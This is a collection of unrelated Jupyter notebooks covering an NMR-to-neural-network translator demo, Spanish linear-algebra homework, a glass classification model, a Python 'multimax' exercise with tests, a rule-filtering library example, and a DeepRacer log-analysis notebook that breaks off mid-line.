0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ###Markdown The input file starts out with the empirical formula, followed by a list of the peak location, peak area, and peak multiplicity. Since we are using C-NMR, all of the peak areas should be set to 1. If the input file is not a training file, then it will end after this list. If the input file is a training file, then it will also include a connectivity matrix at the end. To run the file through the nn_traslator we use the following function which take 2 arguments:1. The path to the input file (string)2. Whether or not this is a training file (boolean default=True) ###Code output = nnt('nn_translator_test.txt', True) ###Output _____no_output_____ ###Markdown This function will output a tuple with two elements. We check the size of each element and make sure they are the expected sizes (3350 and 432 by 432): ###Code len(output[0]) print(len(output[1]), 'by', len(output[1][0])) ###Output 432 by 432 ###Markdown The elements are included in the first 11 elements of `input[0]`: ###Code output[0][0:10] ###Output _____no_output_____ ###Markdown The rest of `input[0]` contains the multiplicities of peaks at locations that correspond with their index number (there is not a peak at 9.0 there will be a zero at `index = 90+11`, but there quartet at 9.1, so we will see a 4 at `index = 91+11` ): ###Code output[0][90+11:110] ###Output _____no_output_____ ###Markdown The elements of the connectivity matrix that is included in the input file are expanded into a conectivity matrix of size 432 by 432 where the first 182 rows represent the connections to hydrogens, the next 144 rows contain the carbon connections, and so on with N, O, S, F, Cl, Br, P, I, and B.Since hydrogen cannot bond with hydrogen, if we look at the first row, we will see that the first 22 elements (looking just at the columns related to the number of hydrogens in our system, for the sake of looking at a reasonably sized matrix) will be zero: ###Code for i in range(0,22): print(output[1][i][0:22]) ###Output [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ###Markdown We can look at the carbon hydrogen bonds by looking at the block for elements (i,j) where i runs from 0 to 22 and j runs from 183 to 198: ###Code for i in range(0,22): print(output[1][i][183:198]) ###Output [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0] [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ###Markdown However, if we look at the carbon carbon block (for the first 15 carbons, since those are the ones involved in bonding) we will see single and double bonds: ###Code for i in range(183, 198): print(output[1][i][183:198]) ###Output [0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [1, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 2, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 0, 0, 0, 0, 1] [0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0] ###Markdown We can also see the relevent carbon oxygen bonds in the following block: ###Code for i in range(346, 348): print(output[1][i][183:198]) ###Output [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
Tareas/Tarea #1.3_06 febrero.ipynb
###Markdown Robótica Industrial--Alejandro Rojas Barba Fecha de entrega: 11 de febrero del 2019Tarea 3 Ejercicio 1--La señora Mercedes fue al mercado y le ofrecieron las siguientes promociones: un paquete de 3 jabones, 2 cremas dentales y 4 cepillos de dientes, por 206; un segundo paquete de 5 jabones, 3 cremas dentales y 2 cepillos por 210; un tercer paquete contenía 6 unidades de cada uno de los anteriores artículos, por 412. ¿Cuál es el costo de cada artículo? ###Code import numpy as np A=np.array([ [3,2,4], [5,3,2], [6,6,6] ]) B=np.array([ [206], [210], [412] ]) C=np.linalg.inv(A)@B print("Jabones:",float(C[0])) print("Cepillos dentales:",float(C[1])) print("Sal:",float(C[2])) ###Output Jabones: 15.333333333333357 Cepillos dentales: 26.666666666666657 Sal: 26.66666666666667 ###Markdown Ejercicio 2--La señora Juana compra 3kg de frijol, 2 kg de sal y 1 kg de arroz por 130. La señora Petra compra 2 kg de frijol, 1 kg de sal y 1 kg de arroz pagando un total de 90. Otra señora compra compra 1 kg de frijol, 1 kg de sal, 1 kg de arroz pagando un total de 60. Si las tres señoras compraron en la misma tienda, ¿Cuál es el precio por kg de cada producto? ###Code A=np.array([ [3,2,1], [2,1,1], [1,1,1] ]) B=np.array([ [130], [90], [60] ]) C=np.linalg.inv(A)@B print("Frijol:",int(C[0])) print("Sal:",int(C[1])) print("Arroz:",int(C[2])) ###Output Frijol: 30 Sal: 10 Arroz: 20
Neural Networks/Glass.ipynb
###Markdown ###Code import tensorflow as tf import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline print(f'Tensorflow version: {tf.__version__}') glass_data = pd.read_csv('/content/drive/My Drive/Colab Notebooks/glass.csv', parse_dates=True, encoding = "cp1252") glass_data.head() glass_data.groupby('Type').count().reset_index() glass_data['Type'].replace(to_replace={1: 0, 2: 1, 3: 2, 4: 3, 5: 4, 6: 5, 7: 6}, inplace=True) corr = glass_data.corr(method = "pearson") # corr = glass_data.corr(method = "spearman") # corr = glass_data.corr(method = "kendall") f, ax = plt.subplots(figsize=(10, 10)) sns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True), square=True, ax=ax, annot=True) X = glass_data[['RI','Na','Mg','Al','Si','K','Ca','Ba','Fe']] y = glass_data['Type'] from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) from sklearn.preprocessing import StandardScaler scaler = StandardScaler() X_train = scaler.fit_transform(X_train) X_test = scaler.transform(X_test) print(X_train.shape[1]) print(y.unique()) model = tf.keras.models.Sequential([ tf.keras.layers.Dense(units=155, input_shape=(X_train.shape[1],), activation='relu'), tf.keras.layers.Dense(units=72, activation='relu'), tf.keras.layers.Dense(units=152, activation='relu'), tf.keras.layers.Dense(units=52, activation='relu'), tf.keras.layers.Dense(units=152, activation='relu'), tf.keras.layers.Dense(units=52, activation='relu'), tf.keras.layers.Dense(units=7, activation='softmax') ]) model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.summary() cl = model.fit(X_train, y_train, validation_data=(X_test,y_test), epochs=50) fig, ax = plt.subplots(figsize=(15,5)) plt.plot(cl.history['accuracy'], label='accuracy') plt.plot(cl.history['val_accuracy'], label='val_accuracy', linestyle='--') plt.plot(cl.history['loss'], label='loss') plt.plot(cl.history['val_loss'], label='val_loss', linestyle='--') plt.legend() y_pred = model.predict(X_test) y_test_list=list(y_test) total=len(y_test_list) correct=0 # for i in range(len(y_test_list)): # print(f'{i+1} - {y_pred[4][i]:.3f} - {y_test_list[4]}') # if np.argmax(y_pred[i])+1==y_test_list[i]: # print(f'{i+1} - {np.argmax(y_pred[i])} - {y_test_list[i]}') for i in range(total): # print(f'{np.argmax(y_pred[i])} - {np.amax(y_pred[i])} - {y_test_list[i]}') if(np.argmax(y_pred[i])==y_test_list[i]): correct+=1 print(f'{correct}/{total}') print(correct/total) p_test = model.predict(X_test).argmax(axis=1) cm = tf.math.confusion_matrix(y_test, p_test) f, ax = plt.subplots(figsize=(7, 5)) sns.heatmap(cm, annot=True, cmap='Blues', square=True, linewidths=0.01, linecolor='grey') plt.title('Confustion matrix') plt.ylabel('True label') plt.xlabel('Predicted label') ###Output _____no_output_____
.ipynb_checkpoints/view_pairs-checkpoint.ipynb
###Markdown Todos based on today's observations1. Detect when there is an implicit multiplication?2. avoid situations like 1,…,n−1.3. Potentially get rid of fractions?4. split on hspace, vspace, \\\\ (EQDS31476149Q)5. get rid of text6. add a tf-idf post-pass7. add comma, semicolor split operator8. Detect series? ###Code katex('\\vec{\\xi}') katex('\\xi') ###Output _____no_output_____
Python/Python Morsels/multimax/my_try/multimax.ipynb
###Markdown Bonus1: Make sure the function returns an empty list if the iterable is empty ###Code multimax([]) ###Output _____no_output_____ ###Markdown Bonus2: Make sure the function works well with iterator such as files, generators etc ###Code numbers = [1, 3, 8, 5, 4, 10, 6] odds = (n for n in numbers if n % 2 == 1) multimax(odds) ###Output _____no_output_____ ###Markdown Bonus3: The multimax function accept a keyword argument called "key" that is a function which will be used to determine the key by which to compare values as maximums. For example the key function could be used to find the longest words in a list of words ###Code words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"] multimax(words, key=len) words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"] max(words, key=len) words = ["cheese", "shop", "argument", "of", "silly", "walks", "ministry", "clinic"] max(words, key=len) ###Output _____no_output_____ ###Markdown Unitests ###Code import unittest class MultiMaxTests(unittest.TestCase): """Tests for multimax.""" def test_single_max(self): self.assertEqual(multimax([1, 2, 4, 3]), [4]) def test_two_max(self): self.assertEqual(multimax([1, 4, 2, 4, 3]), [4, 4]) def test_all_max(self): self.assertEqual(multimax([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1]) def test_lists(self): inputs = [[0], [1], [], [0, 1], [1]] expected = [[1], [1]] self.assertEqual(multimax(inputs), expected) def test_order_maintained(self): inputs = [ (3, 2), (2, 1), (3, 2), (2, 0), (3, 2), ] expected = [ inputs[0], inputs[2], inputs[4], ] outputs = multimax(inputs) self.assertEqual(outputs, expected) self.assertIs(outputs[0], expected[0]) self.assertIs(outputs[1], expected[1]) self.assertIs(outputs[2], expected[2]) # To test the Bonus part of this exercise, comment out the following line # @unittest.expectedFailure def test_empty(self): self.assertEqual(multimax([]), []) # To test the Bonus part of this exercise, comment out the following line # @unittest.expectedFailure def test_iterator(self): numbers = [1, 4, 2, 4, 3] squares = (n**2 for n in numbers) self.assertEqual(multimax(squares), [16, 16]) # To test the Bonus part of this exercise, comment out the following line # @unittest.expectedFailure def test_key_function(self): words = ["alligator", "animal", "apple", "artichoke", "avalanche"] outputs = ["alligator", "artichoke", "avalanche"] self.assertEqual(multimax(words, key=len), outputs) if __name__ == "__main__": unittest.main(argv=['first-arg-is-ignored'], exit=False) ###Output ........ ---------------------------------------------------------------------- Ran 8 tests in 0.004s OK
iguanas/rule_selection/examples/simple_filter_example.ipynb
###Markdown Simple Filter Example The SimpleFilter class is used to filter out low performing rules from a set. Requirements To run, you'll need the following:* A rule set (specifically the binary columns of the rules as applied to a dataset). ---- Import packages ###Code from iguanas.rule_selection import SimpleFilter from iguanas.metrics.classification import FScore import pandas as pd ###Output _____no_output_____ ###Markdown Read in data Let's read in some dummy rules (stored as binary columns) and the target column. ###Code X_rules_train = pd.read_csv( 'dummy_data/X_rules_train.csv', index_col='eid' ) y_train = pd.read_csv( 'dummy_data/y_train.csv', index_col='eid' ).squeeze() X_rules_test = pd.read_csv( 'dummy_data/X_rules_test.csv', index_col='eid' ) y_test = pd.read_csv( 'dummy_data//y_test.csv', index_col='eid' ).squeeze() X_rules_train.columns.tolist() ###Output _____no_output_____ ###Markdown ---- Filter rules based on performance metrics Set up class parameters Now we can set our class parameters for the `SimpleFilter` class. You need to provide the metric you want to filter by, as well as the threshold value and type of operator. Here, we'll be filtering out rules with an F1 score < 0.46. To filter on F1 score, we'll use the `FScore` class from the `metrics` module.**Please see the class docstring for more information on each parameter.** ###Code f1 = FScore(beta=1) params = { 'threshold': 0.46, 'operator': '>=', 'metric': f1.fit } ###Output _____no_output_____ ###Markdown Instantiate class and run fit method Once the parameters have been set, we can run the `fit` method to calculate which rules should be kept. ###Code fr = SimpleFilter(**params) fr.fit( X_rules=X_rules_train, y=y_train ) ###Output _____no_output_____ ###Markdown Outputs The `fit` method does not return anything. See the `Attributes` section in the class docstring for a description of each attribute generated: ###Code fr.rules_to_keep ###Output _____no_output_____ ###Markdown ---- Drop filtered rules from another dataset Use the `transform` method to drop the filtered rules from a given dataset. ###Code X_rules_test_filtered = fr.transform(X_rules=X_rules_test) ###Output _____no_output_____ ###Markdown Outputs The `transform` method returns a dataframe with the filtered rules dropped: ###Code X_rules_test_filtered.head() ###Output _____no_output_____ ###Markdown ---- Calculate filtered rules and drop them from a dataset (in one step) You can also use the `fit_transform` method to calculate the filtered rules and drop them from the training set. ###Code X_rules_train_filtered = fr.fit_transform( X_rules=X_rules_train, y=y_train ) ###Output _____no_output_____ ###Markdown Outputs The `fit_transform` method returns a dataframe with the filtered rules dropped: ###Code fr.rules_to_keep X_rules_train_filtered.head() ###Output _____no_output_____
dialectal segmenter/Transforming Code into Beautiful, Idiomatic Python.ipynb
###Markdown Grouping with dectionaries ###Code names = ['Mohamed', 'disooqi', 'Asmaa', 'Mariam', 'Fatema'] d={} for name in names: key = len(name) if key not in d: d[key] = [] d[key].append(name) d from collections import defaultdict d = defaultdict(list) for name in names: key = len(name) d[key].append(name) d # from collections import ChainMap from __future__ import ChainMap d = ChainMap(c, b) from collections import namedtuple dos = namedtuple('disooqi', ['married','kids','job']) dos(4,2,1) ###Output _____no_output_____
log-analysis/DeepRacer Log Analysis.ipynb
###Markdown Simulation Run Log Analysis and Visualization for AWS DeepRacerThis notebook walks through how you can analyze and debug using the AWS DeepRacer Simulation logs ```1. Tools to find best iteration of your model2. Visualize reward distribution on the track 2.1 Visualize reward heatmap per episode or iteration3. Identify hotspots on the track for your model4. Understand probability distributions on simulated images5. Evaluation run analysis - plot lap speed heatmap``` Requirementsboto3 >= 1.9.133 ; configure your aws cli and/or boto credentials fileAWS CLI: https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.htmlBoto Configuration: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html ###Code import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import datetime %matplotlib inline #Shapely Library from shapely.geometry import Point, Polygon from shapely.geometry.polygon import LinearRing, LineString from log_analysis import * import cw_utils # Make sure your boto version is >= '1.9.133' cw_utils.boto3.__version__ #print log files and show most recent. You may want to use that file for analysis import os file_list = [] for file in os.listdir("logs"): if(file=="latest"): continue file_list.append([os.stat(os.path.join("logs", file)).st_mtime, os.path.join("logs", file)]) file_list.sort(key=lambda x: x[0]) # sort by creation date print(file + " : " + str(os.stat(os.path.join("logs", file)).st_mtime)) print("\nMost recent file = " + file_list[-1][1]) fname = file_list[-1][1] ###Output deepracer-fe179db0-c1f3-11e9-8c5c-0242ac120004.log : 1566166485.1706324 c02f1706-c13c-11e9-8ad0-0242ac120004 : 1566080238.9316764 deepracer-5bf07a28-c1ff-11e9-ae47-0242ac120004.log : 1566166072.0296586 deepracer-Oval_track.log : 1566167056.440198 deepracer-Oval_Track.log : 1566178685.2514682 log : 1566862739.0616481 deepracer-sim-2zfqgg08b2bl.log : 1566260306.61707 deepracer-sim-sample.log : 1566167020.652166 deepracer-dr-sm-rltj--20190819134949-f350b748-9893-4350-8d32-3869ab5038e3.log : 1566261861.6997128 deepracer-6ebf6bca-c13f-11e9-bd3a-0242ac120004.log : 1566166471.5945964 deepracer-sim-j5gdq7sxh2c2.log : 1566261926.8624902 Most recent file = logs/log ###Markdown Download the desired log file given the simulation ID If you wish to bulk export the logs from Amazon Cloudwatch to Amazon S3 :: https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/S3ExportTasks.html ###Code #stream_name = 'sim-2zfqgg08b2bl' ## CHANGE This to your simulation application ID stream_name = 'sim-j5gdq7sxh2c2' #training 5 min fname = 'logs/deepracer-%s.log' %stream_name cw_utils.download_log(fname, stream_prefix=stream_name) !tail -n 3 $fname ###Output SIM_TRACE_LOG:20,55,3.9585,0.6759,-0.0161,-0.26,0.50,2,1.0000,False,True,5.9333,4,17.67,1566223048.2305052 SIM_TRACE_LOG:20,56,3.9712,0.6751,-0.0155,-0.52,1.00,1,1.0000,False,True,6.0052,4,17.67,1566223048.2976956 SIM_TRACE_LOG:20,57,3.9911,0.6734,-0.0246,0.00,1.00,5,1.0000,False,True,6.1177,4,17.67,1566223048.3647573 ###Markdown Load waypoints for the track you want to run analysis on```Tracks Available::AWS_track Straight_track Oval_trackBowtie_track H_track reinvent_base``` ###Code def get_track_waypoints(track_name): return np.load("tracks/%s.npy" % track_name) waypoints = get_track_waypoints("reinvent_base") ### re:invent track waypoints.shape ###Output _____no_output_____ ###Markdown Visualize the Track and Waypoints ###Code l_center_line = LineString(waypoints[:,0:2]) l_inner_border = LineString(waypoints[:,2:4]) l_outer_border = LineString(waypoints[:,4:6]) road_poly = Polygon(np.vstack((l_outer_border, np.flipud(l_inner_border)))) road_poly # rescale waypoints to centimeter scale center_line = waypoints[:,0:2] *100 inner_border = waypoints[:,2:4] *100 outer_border = waypoints[:,4:6] *100 ###Output _____no_output_____ ###Markdown Helper Functions ###Code def plot_track(df, track_size=(500, 800), x_offset=0, y_offset=0): ''' Each track may have a diff track size, For reinvent track, use track_size=(500, 800) Tokyo, track_size=(700, 1000) x_offset, y_offset is used to convert to the 0,0 coordinate system ''' track = np.zeros(track_size) # lets magnify the track by *100 for index, row in df.iterrows(): x = int(row["x"]) + x_offset y = int(row["y"]) + y_offset reward = row["reward"] track[y,x] = reward fig = plt.figure(1, figsize=(12, 16)) ax = fig.add_subplot(111) print_border(ax, center_line, inner_border, outer_border) return track def plot_top_laps(sorted_idx, n_laps=5): fig = plt.figure(n_laps, figsize=(12, 30)) for i in range(n_laps): idx = sorted_idx[i] episode_data = episode_map[idx] ax = fig.add_subplot(n_laps,1,i+1) line = LineString(center_line) plot_coords(ax, line) plot_line(ax, line) line = LineString(inner_border) plot_coords(ax, line) plot_line(ax, line) line = LineString(outer_border) plot_coords(ax, line) plot_line(ax, line) for idx in range(1, len(episode_data)-1): x1,y1,action,reward,angle,speed = episode_data[idx] car_x2, car_y2 = x1 - 0.02, y1 plt.plot([x1*100, car_x2*100], [y1*100, car_y2*100], 'b.') return fig ###Output _____no_output_____ ###Markdown Load the training log ###Code data = load_data(fname) df = convert_to_pandas(data) df.head() df['y'].min(), df['y'].max() # Normalize the rewards to a 0-1 scale from sklearn.preprocessing import MinMaxScaler min_max_scaler = MinMaxScaler() scaled_vals = min_max_scaler.fit_transform(df['reward'].values.reshape(df['reward'].values.shape[0], 1)) df['reward'] = pd.DataFrame(scaled_vals.squeeze()) df['reward'].min(), df['reward'].max() ###Output _____no_output_____ ###Markdown Plot rewards per IterationThis graph is useful to understand the mean reward and standard deviation within each episode ###Code REWARD_THRESHOLD = 100 # reward graph per episode min_episodes = np.min(df['episode']) max_episodes = np.max(df['episode']) print('Number of episodes = ', max_episodes) total_reward_per_episode = list() for epi in range(min_episodes, max_episodes): df_slice = df[df['episode'] == epi] total_reward_per_episode.append(np.sum(df_slice['reward'])) average_reward_per_iteration = list() deviation_reward_per_iteration = list() buffer_rew = list() for val in total_reward_per_episode: buffer_rew.append(val) if len(buffer_rew) == 20: average_reward_per_iteration.append(np.mean(buffer_rew)) deviation_reward_per_iteration.append(np.std(buffer_rew)) # reset buffer_rew = list() fig = plt.figure(figsize=(6, 12)) ax = fig.add_subplot(311) ax.plot(np.arange(len(average_reward_per_iteration)), average_reward_per_iteration, '.') ax.set_title('Rewards per Iteration') ax.set_ylabel('Mean reward') ax.set_xlabel('Iteration') for rr in range(len(average_reward_per_iteration)): if average_reward_per_iteration[rr] >= REWARD_THRESHOLD : ax.plot(rr, average_reward_per_iteration[rr], 'r.') plt.grid(True) ax = fig.add_subplot(312) ax.plot(np.arange(len(deviation_reward_per_iteration)), deviation_reward_per_iteration, '.') ax.set_ylabel('Dev of reward') ax.set_xlabel('Iteration') plt.grid(True) for rr in range(len(average_reward_per_iteration)): if average_reward_per_iteration[rr] >= REWARD_THRESHOLD: ax.plot(rr, deviation_reward_per_iteration[rr], 'r.') ax = fig.add_subplot(313) ax.plot(np.arange(len(total_reward_per_episode)), total_reward_per_episode, '.') ax.set_ylabel('Total reward') ax.set_xlabel('Episode') ###Output Number of episodes = 20 ###Markdown Analyze the reward distribution for your reward function ###Code # add y_offset to bring everything to the positive axis y_offset = int(df['y'].min()) if y_offset > 0: # if positive, just keep it the same y_offset = 0 y_offset = abs(y_offset) inner_border[:,1] = inner_border[:,1] + y_offset center_line[:,1] = center_line[:,1] + y_offset outer_border[:,1] = outer_border[:,1] + y_offset #NOTE: For the Tokyo track use this dimentions #track = plot_track(df, track_size=(700, 1000), x_offset=0, y_offset=y_offset) #plt.title("Reward distribution for all actions ") #im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower") track = plot_track(df) plt.title("Reward distribution for all actions ") im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower") ###Output _____no_output_____ ###Markdown Plot a particular iteration ###Code iteration_id = 36 track = plot_track(df[df['iteration'] == iteration_id]) plt.title("Reward distribution for all actions ") im = plt.imshow(track, cmap='hot', interpolation='bilinear', origin="lower") ###Output _____no_output_____ ###Markdown Path taken for top reward iterationsNOTE: in a single episode, the car can go around multiple laps, the episode is terminated when car completes 1000 steps ###Code action_map, episode_map, sorted_idx = episode_parser(data) fig = plot_top_laps(sorted_idx[:], 3) ###Output _____no_output_____ ###Markdown Path taken in a particular episode ###Code ## Evaluation RUN def plot_episode_run(df, E): fig = plt.figure(1, figsize=(12, 16)) ax = fig.add_subplot(211) print_border(ax, center_line, inner_border, outer_border) episode_data = df[df['episode'] == E] for row in episode_data.iterrows(): x1,y1,action,reward = row[1]['x'], row[1]['y'], row[1]['action'], row[1]['reward'] car_x2, car_y2 = x1 - 0.02, y1 plt.plot([x1, car_x2], [y1, car_y2], 'r.') plot_episode_run(df, E=500) # arbitrary episode ###Output _____no_output_____ ###Markdown Path taken in a particular Iteration ###Code iteration_id = 20 EPISODE_PER_ITER = 30 #number of episodes per iteration as defined in your hyperparameters for i in range((iteration_id-1)*EPISODE_PER_ITER, (iteration_id)*EPISODE_PER_ITER): plot_episode_run(df, E=i) ###Output /home/ccsantos/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:4: MatplotlibDeprecationWarning: Adding an axes using the same arguments as a previous axes currently reuses the earlier instance. In a future version, a new instance will always be created and returned. Meanwhile, this warning can be suppressed, and the future behavior ensured, by passing a unique label to each axes instance. after removing the cwd from sys.path. ###Markdown Action breakdown per iteration and historgram for action distribution for each of the turns - reinvent trackThis plot is useful to understand the actions that the model takes for any given iteration.** NOTE: This is only supported for reinvent track currently ** ###Code fig = plt.figure(figsize=(16, 24)) iterations_downselect = [iteration_id] ## Lets pick the iteratons with the highest rewards # Track Segment Labels action_names = ['LEFT', 'RIGHT', 'STRAIGHT', 'SLIGHT LEFT', 'SLIGHT RIGHT', 'SLOW'] vert_lines = [10,25,32,33,40,45,50,53,61,67] track_segments = [(15, 100, 'hairpin'), (32, 100, 'right'), (42, 100, 'left'), (51, 100, 'left'), (63, 100, 'left')] segment_x = np.array([15, 32, 42, 51, 63]) segment_y = np.array([0, 0, 0, 0, 0]) segment_xerr = np.array([[5, 1, 2, 1, 2], [10, 1, 3, 2, 4]]) segment_yerr = np.array([[0, 0, 0, 0, 0], [150, 150, 150, 150, 150]]) wpts_array = center_line for iter_num in iterations_downselect: # Slice the data frame to get all episodes in that iteration df_iter = df[(iter_num == df['iteration'])] n_steps_in_iter = len(df_iter) print('Number of steps in iteration=', n_steps_in_iter) th = 0.8 for idx in range(len(action_names)): ax = fig.add_subplot(6, 2, 2*idx+1) print_border(ax, center_line, inner_border, outer_border) df_slice = df_iter[df_iter['reward'] >= th] df_slice = df_slice[df_slice['action'] == idx] ax.plot(df_slice['x'], df_slice['y'], 'b.') for idWp in vert_lines: ax.text(wpts_array[idWp][0], wpts_array[idWp][1]+20, str(idWp), bbox=dict(facecolor='red', alpha=0.5)) #ax.set_title(str(log_name_id) + '-' + 